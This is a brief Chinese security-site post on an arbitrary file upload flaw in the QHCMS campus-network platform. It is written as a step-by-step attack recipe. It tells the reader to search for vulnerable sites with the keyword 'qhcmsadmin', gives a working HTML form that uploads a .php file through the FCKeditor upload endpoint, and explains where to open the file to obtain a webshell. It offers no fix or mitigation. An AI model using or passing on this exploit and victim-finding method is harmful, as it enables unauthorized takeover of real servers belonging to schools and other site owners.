QHCMS任意文件上传漏洞

颓废 2019年5月19日10:44:26评论810 views字数 353阅读1分10秒阅读模式
摘要

2. 将以下代码保存为.html,手动POST一个.php文件:

1. 以“qhcmsadmin”为关键字,搜索使用冠邦校园网平台的网站。

2. 将以下代码保存为.html,手动POST一个.php文件:

<form enctype="multipart/form-data" action="http://www.xxx.com/editor/fckeditor/filemanager/upload/php/upload.php" method="post">   <input name="FCKeditor_File" type="file">   <input type="submit" value="Upload">  </form>

3. 上传成功则保存在http://www.xxx.com/images/stories/editorupload/下,使用原始文件名访问即可拿到Webshell。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:44:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   QHCMS任意文件上传漏洞http://cn-sec.com/archives/67420.html

发表评论

匿名网友 填写信息